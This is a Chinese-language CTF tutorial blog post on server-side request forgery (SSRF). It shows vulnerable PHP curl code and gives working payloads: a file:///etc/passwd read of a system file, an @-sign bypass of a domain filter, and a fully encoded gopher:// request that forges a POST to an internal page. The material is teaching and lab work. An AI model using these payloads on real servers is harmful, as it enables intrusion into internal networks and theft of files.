当前位置:   article > 正文

【CTF】SSRF服务器端请求伪造_ctf ssrf

ctf ssrf

SSRF 服务器端请求伪造(借刀沙人)

SSRF(全称Server-Side Request Forgery),即服务器端请求伪造,是一种利用漏洞来伪造服务器端发起请求的漏洞攻击。由于请求都是由内部发起的,所以一般情况下,SSRF漏洞攻击的目标往往是从外网无法正常访问的内部系统,因此可以总结为借刀kill人。
  • 1

漏洞危害:

  • 扫描内网开放端口服务
  • 向内网中的任意主机的任意端口发送payload来攻击内网服务
  • 向内网发动DOS攻击
  • 攻击内网的Web应用(如直接SQL注入、XSS攻击等)
  • 利用file、gopher、dict协议来读取本地文件、执行命令等

漏洞原理:

SSRF漏洞原理就是将发起请求的服务器当作跳板,从而可以由其来攻击内网中的一些其他服务。
  • 1

从pikachu中来看:

PHP中下面函数的使用不当会导致SSRF:
file_get_contents()
fsockopen()
curl_exec()
  • 1
  • 2
  • 3
  • 4

例子:

// 请求对方页面前端源代码,在当前页码进行展示
<?php
function curl($url){
    // 创建一个新的curl资源
    $ch = curl_init();
    // 设置URL和相应的选项
    curl_setopt($ch, option:CIRLOPT_URL, &url);
    curl_setopt($ch, option:CIRLOPT_HEADER, value:false);
    // 抓取url并把它传递给浏览器
    curl_exec($ch);
    // 关闭curl资源,并且释放系统资源
    curl_close($ch);
}
url = $_GET['url'];
curl($url);
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
利用一个网站:www.cip.cc来理解SSRF漏洞,首先使用我的本机访问该网站,会发现网站上回显的IP地址和信息都是我本机的:
  • 1

在这里插入图片描述
然后,使用百度翻译翻译页面功能来访问该页面,会发现此时的IP变为了百度的IP,也就是说这一个访问请求,其实是由百度的服务器来发起的,而不是攻击者。SSRF的原理就是将控制功能中发起请求的服务当作跳板攻击内网中的其他服务。

过滤绕过:

SSRF中当跳转被过滤,例如如果域名不是以xxx为开头的,就不让执行,那么此时就可以使用@符号来绕过:
  • 1
?url=http://xxx@baidu.com
  • 1
使用该方式,那么在解析域名时,会将@前的内容当作用户名密码。例如,此时限制了只能访问www.aaa.com域名地址,但是你想要访问www.bbb.com,就可以构造语句为:
  • 1
?url=http://www.aaa.com@www.bbb.com
  • 1
那么,此时curl识别到的域名地址为www.bbb.com,则可正常访问到它。
  • 1

协议利用:

包括但不仅限于:

file协议:可以通过file协议来读取系统的文件内容

dict协议:字典服务器协议,让客户端能够访问更多字典源。在SSRF中可以获取目标服务器上运行的服务版本等信息

gopher协议:gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。使用gopher协议时,通过控制访问的URL可实现向指定的服务器发送任意内容,如HTTP请求、MySQL请求等,所以其攻击面非常之广。

此处我们先着重讲解一下file协议:

同样通过pikachu来进行测试,尝试访问我的服务器的/etc/passwd文件
在这里插入图片描述
此处可以发现,通过file协议构造payload:

?url=file:///etc/passwd
  • 1

是读取到了我服务器的/etc/passwd的文件内容的,采取同样的方法,我是可以对我的服务器读取更多的文件内容的。

例题:

在这里插入图片描述
首先从题目来看,涉及到了ssrf漏洞的利用代码curl_exec

此处出现了一个函数parse_url(),该函数的功能为解析 URL 并返回关联数组,包含在 URL 中出现的各种组成部分,对严重不合格的 URL,parse_url() 可能会返回 false。 也就是说,此时我传入的url必须为一个符合规定格式的url地址,就比如以http://开头。

如果url格式不正确的话,就会返回一个"Can not parse url:".$_GET[‘url’]

从本题来看,他说他在baidu.com下放了一个flag.txt,但是试想一下,这个baidu.com是不可能为真正的百度的那个域名的,所以此处这个baidu.com应该为出题者所建的一个目录,所以就是ssrf读文件,我们就想到使用file协议来读取flag.txt这个文件。

并且,此处分析语句:

substr($_GET['url'], strlen('http://'), strlen('baidu.com')) === 'baidu.com'
等价于:substr(url,7,9) === 'baidu.com'
  • 1
  • 2

此处表示,截取所输入内容中的从第7位开始,长度为9的字符串,如果他的内容为baidu.com,那么程序也会die,而且我们所需要用的file://协议恰巧与http://协议长度相同,就很气人。

就想到需要绕过这个限制,使用我们上面有讲到的@符号来尝试,那么就构造payload:

?url=file://@baidu.com/flag.txt
  • 1

在这里插入图片描述成功得到flag

ssrf打内网姿势:

例如当知道对应服务器内网的一个IP,即可通过ssrf点获取该内网IP的内容,进而利用内网中的一些语句,例如此时123.php是内网中的一个可以利用的页面:

image-20230402144441045

image-20230402064903302

此时源码若变为$_POST的形式来传入w,发现无法继续正常得到flag,即可引出以下内容:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jGQSmdAq-1680420003151)(…/AppData/Typora/typora-user-images/image-20230402144509798.png)]

image-20230402065110826

ssrf打内网post传参:

此时需要使用gopher协议(万金油协议):

格式:
gopher://
  • 1
  • 2

image-20230402144225891

gopher协议是Internet上一个非常有名的信息查找系统,其将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。允许用户使用层叠结构的菜单与文件,以发现和检索信息,它拥有世界上最大、最神奇的编目。

<?php
show_source(__FILE__);
function curl($url){
    //创建一个新的curl资源
    $ch = curl_init();
    //设置URL和相应的选项
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_HEADER,false);
    //抓取URL并把它传递给浏览器
    curl_exec($ch);
    //关闭curl资源,并且释放系统资源
    curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

本地搭建以上代码运行

image-20230402145113641

此时模拟内网环境下,有一个111.php,内容如下:

<?php
show_source(__FILE__);
echo file_get_contents($_POST[w]);
  • 1
  • 2
  • 3

image-20230402145306054

接下来就需要通过构造语句通过gopher协议来利用内网中的111.php文件,先构造一个简单包,使用burp抓取传参的数据包,并简化:

image-20230402150548804

gopher协议需要进行编码,接下来需要将这个数据包中的空格替换成%20,换行替换成%0D%0A

POST%20/index.php/111.php?_ijt=5cbcuvrso4ghgg0j29db0oqcjb&_ij_reload=RELOAD_ON_SAVE%20HTTP/1.1%0D%0AHost:%20localhost:63342%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%205%0D%0A%0D%0Aw=111
  • 1

接下来需要对其进行url编码,并且payload前还需要加内容,并对w所需得到的文件修改,同时修改Content-Length的值

payload:

gopher://localhost:63342/_POST%20/index.php/111.php?_ijt=5cbcuvrso4ghgg0j29db0oqcjb&_ij_reload=RELOAD_ON_SAVE%20HTTP/1.1%0D%0AHost:%20localhost:63342%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2010%0D%0A%0D%0Aw=flag.php
  • 1

在进行url编码

http://localhost:63342/index.php/123.php?url=%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%33%34%32%2f%5f%50%4f%53%54%25%32%30%2f%69%6e%64%65%78%2e%70%68%70%2f%31%31%31%2e%70%68%70%3f%5f%69%6a%74%3d%35%63%62%63%75%76%72%73%6f%34%67%68%67%67%30%6a%32%39%64%62%30%6f%71%63%6a%62%26%5f%69%6a%5f%72%65%6c%6f%61%64%3d%52%45%4c%4f%41%44%5f%4f%4e%5f%53%41%56%45%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%3a%25%32%30%6c%6f%63%61%6c%68%6f%73%74%3a%36%33%33%34%32%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%25%32%30%31%30%25%30%44%25%30%41%25%30%44%25%30%41%77%3d%66%6c%61%67%2e%70%68%70
  • 1

传入即可得到flag

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/909316
推荐阅读
相关标签
  

闽ICP备14008679号